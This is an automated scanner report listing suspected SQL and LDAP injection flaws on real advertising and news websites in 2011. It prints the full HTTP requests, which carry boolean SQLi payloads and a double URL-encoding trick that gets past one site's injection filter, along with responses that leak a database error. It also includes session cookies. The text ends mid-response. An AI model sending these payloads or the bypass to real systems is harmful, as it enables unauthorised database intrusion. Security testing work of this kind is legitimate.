CWE-89, SQL Injection, DORK, SQLi, 2-14-2011, DORK Report

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 09:00:46 CST 2011.


1. SQL injection

1.1. http://c5.zedo.com//ads2/k/889025/4381/172/0/305004506/305004506//0/305/916//1000003/i.js [REST URL parameter 11]

1.2. http://sitelife.desmoinesregister.com/ver1.0/SiteLifeProxy [name of an arbitrarily supplied request parameter]

1.3. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]

1.4. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.5. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.6. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.7. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.8. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.9. http://www.desmoinesregister.com/scripts/app/js/jquery-1.3.1.min.js [REST URL parameter 2]

1.10. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]

2. LDAP injection

2.1. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

2.2. http://tap.rubiconproject.com/oz/sensor [put_2100 cookie]

1. SQL injection
There are 10 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights and to avoid vulnerabilities being introduced by changes elsewhere within the application's code base.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://c5.zedo.com//ads2/k/889025/4381/172/0/305004506/305004506//0/305/916//1000003/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://c5.zedo.com
Path:   //ads2/k/889025/4381/172/0/305004506/305004506//0/305/916//1000003/i.js

Issue detail

The REST URL parameter 11 appears to be vulnerable to SQL injection attacks. The payloads 42801041%20or%201%3d1--%20 and 42801041%20or%201%3d2--%20 were each submitted in the REST URL parameter 11. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET //ads2/k/889025/4381/172/0/305004506/305004506//0/305/91642801041%20or%201%3d1--%20//1000003/i.js HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=4506/2941/1;s=916;d=17;w=720;h=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response 1

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 1729344673
Cache-Control: max-age=2592000
Expires: Wed, 16 Mar 2011 14:42:47 GMT
Date: Mon, 14 Feb 2011 14:42:47 GMT
Connection: close
Content-Length: 2165


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
</A>")

Request 2

GET //ads2/k/889025/4381/172/0/305004506/305004506//0/305/91642801041%20or%201%3d2--%20//1000003/i.js HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=4506/2941/1;s=916;d=17;w=720;h=300
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 269055336
Cache-Control: max-age=2591996
Expires: Wed, 16 Mar 2011 14:42:43 GMT
Date: Mon, 14 Feb 2011 14:42:47 GMT
Connection: close
Content-Length: 2529


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
e
...[SNIP]...
</A>")

var zzllnw = new Image();
var zzxads = new Image();
if ((Math.floor(Math.random()*1000000)%9)==0) {
zzllnw.src='http://l1.zedo.com/log/p.gif?a=27536;c=101000000;x=3840;n=101;e=i;i=0;s=0;z='+Math.random()+';logdomain=l1.zedo.com';
zzxads.src='http://xads.zedo.com/ads2/p/l?a=27535;c=101000000;x=3840;n=101;e=i;i=0;s=0;z='+Math.random()+';logdomain=l1.zedo.com';
}

1.2. http://sitelife.desmoinesregister.com/ver1.0/SiteLifeProxy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sitelife.desmoinesregister.com
Path:   /ver1.0/SiteLifeProxy

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 20467713'%20or%201%3d1--%20 and 20467713'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ver1.0/SiteLifeProxy?sid=sitelife.DesMoinesRegister.com&120467713'%20or%201%3d1--%20=1 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4082863653; path=/
Cache-Control: public, max-age=86400
Content-Type: text/javascript; charset=utf-8
Expires: Tue, 15 Feb 2011 10:07:23 GMT
Last-Modified: Mon, 14 Feb 2011 10:07:23 GMT
ETag: -726392143
Vary: Host
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm25l3pluckcom
Set-Cookie: SiteLifeHost=gnvm25l3pluckcom; domain=desmoinesregister.com; path=/
Set-Cookie: anonId=a1694d2b-4620-4b12-92ae-a550aea084e5; domain=desmoinesregister.com; expires=Tue, 14-Feb-2012 14:54:14 GMT; path=/
Date: Mon, 14 Feb 2011 14:54:14 GMT
Content-Length: 102317

//multi site enabled -- sid: sitelife.desmoinesregister.com
document.write("<link href='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeCss?sid=sitelife.desmoinesregister.com' rel='stylesheet' type='text/css' />");
document.write("<script type='text/javascript' src='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeScripts?sid=sitelife.desmoinesregister.com'></script>");
   document.write("<link href='http://www.desmoinesregister.com/gcicommonfiles/sr/css/pluck.css' rel='stylesheet' type='text/css' />");

///<summary>constructor to create a new SiteLifeProxy</summary>
function SiteLifeProxy(url) {
// User Configurable Properties - these can be set at any time

// your apiKey, this value must be set!
this.apiKey = null;

this.siteLifeDomainOverride = null;
this.siteLifeServerBaseOverride = null;
this.customerCSSOverride = null;
this.customerForumPagePathOverride = null;
this.gcid = "Widgets1.0";

// sniff the browser for custom behaviors
this.__isExplorer = navigator.userAgent.toLowerCase().indexOf('msie') != -1;
this.__isSafari = navigator.userAgent.toLowerCase().indexOf('safari') != -1;
this.__isMac = navigator.platform.toLowerCase().indexOf('mac') != -1;
this.__isMacIE = this.__isMac && this.__isExplorer;

// if enabled, spit out d
...[SNIP]...

Request 2

GET /ver1.0/SiteLifeProxy?sid=sitelife.DesMoinesRegister.com&120467713'%20or%201%3d2--%20=1 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4081535073; path=/
Cache-Control: public, max-age=84015
Content-Type: text/javascript; charset=utf-8
Expires: Tue, 15 Feb 2011 10:34:37 GMT
Last-Modified: Mon, 14 Feb 2011 10:34:37 GMT
ETag: -1742467064
Vary: Host
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm11l3pluckcom
Date: Mon, 14 Feb 2011 14:54:15 GMT
Content-Length: 102317

//multi site enabled -- sid: sitelife.desmoinesregister.com
document.write("<link href='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeCss?sid=sitelife.desmoinesregister.com' rel='stylesheet' type='text/css' />");
document.write("<script type='text/javascript' src='http://sitelife.desmoinesregister.com/ver1.0/SiteLifeScripts?sid=sitelife.desmoinesregister.com'></script>");
   document.write("<link href='http://www.desmoinesregister.com/gcicommonfiles/sr/css/pluck.css' rel='stylesheet' type='text/css' />");

///<summary>constructor to create a new SiteLifeProxy</summary>
function SiteLifeProxy(url) {
// User Configurable Properties - these can be set at any time

// your apiKey, this value must be set!
this.apiKey = null;

this.siteLifeDomainOverride = null;
this.siteLifeServerBaseOverride = null;
this.customerCSSOverride = null;
this.customerForumPagePathOverride = null;
this.gcid = "Widgets1.0";

// sniff the browser for custom behaviors
this.__isExplorer = navigator.userAgent.toLowerCase().indexOf('msie') != -1;
this.__isSafari = navigator.userAgent.toLowerCase().indexOf('safari') != -1;
this.__isMac = navigator.platform.toLowerCase().indexOf('mac') != -1;
this.__isMacIE = this.__isMac && this.__isExplorer;

// if enabled, spit out debug information through alert()
this.debug = false;

// used to track the id of the handler expecting the results from the immediately preceeding method invocation
// this is used only for test
...[SNIP]...

1.3. http://tap.rubiconproject.com/oz/sensor [put_1197 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_1197 cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the put_1197 cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6005/12414&cd=false&xt=3&k=&rd=drudgereport.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954'%20and%201%3d1--%20; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response 1

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 14:49:47 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 14-Feb-2012 14:49:47 GMT; Path=/
Set-Cookie: dq=43|5|38|0; Expires=Tue, 14-Feb-2012 14:49:47 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6005/12414&cd=false&xt=3&k=&rd=drudgereport.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954'%20and%201%3d2--%20; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response 2

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 14:49:47 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.4. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The adRotationId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the adRotationId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the adRotationId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047%2527&bannerCreativeAdModuleId=21772 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:41:56 GMT
Expires: Mon, 14 Feb 2011 01:41:57 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCRTSCDC=MDJLPDEAADPMDJOHFMBJCMJL; path=/
X-Powered-By: ASP.NET
Content-Length: 1401
Connection: keep-alive

<br>Error Description:Incorrect syntax near '%'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = 21772, @campaignId = 6468, @syndicationOutletId = 49160, @adrotat
...[SNIP]...

1.5. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the bannerCreativeAdModuleId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the bannerCreativeAdModuleId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&bannerCreativeAdModuleId=21772%2527 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=13047&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:42:14 GMT
Expires: Mon, 14 Feb 2011 01:42:15 GMT
Server: Microsoft-IIS/7.0
